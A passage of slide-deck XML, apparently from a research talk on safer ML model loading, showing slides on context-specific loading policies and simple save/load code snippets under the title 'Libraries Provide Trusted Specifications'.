              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> by loading more benign models without user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>intervention</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="581" name="Google Shape;581;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573150" y="3541925"/>
            <a:ext cx="7997700" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CFE2F3"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>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b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Insight: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>We can make </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>context-specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> loading policies, rather than one-size-fits all.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>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5" name="Shape 585"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="586" name="Google Shape;586;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="587" name="Google Shape;587;p52"/>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588" name="Google Shape;588;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model.load(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.predict(input)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="963300"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Saver</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="591" name="Google Shape;591;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5412875" y="953595"/>
            <a:ext cx="21255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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Model Loader</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>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5" name="Shape 595"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Insight: Libraries Provide Trusted Specifications</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="597" name="Google Shape;597;p53"/>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598" name="Google Shape;598;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="231275" y="1332600"/>
            <a:ext cx="3427500" cy="1477500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model = Model()</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>train(model, corpus)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>model.save(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>‘model.bin’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="599" name="Google Shape;599;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394500" y="1332600"/>
            <a:ext cx="3649500" cy="1046700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>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rgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t> Model, train</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
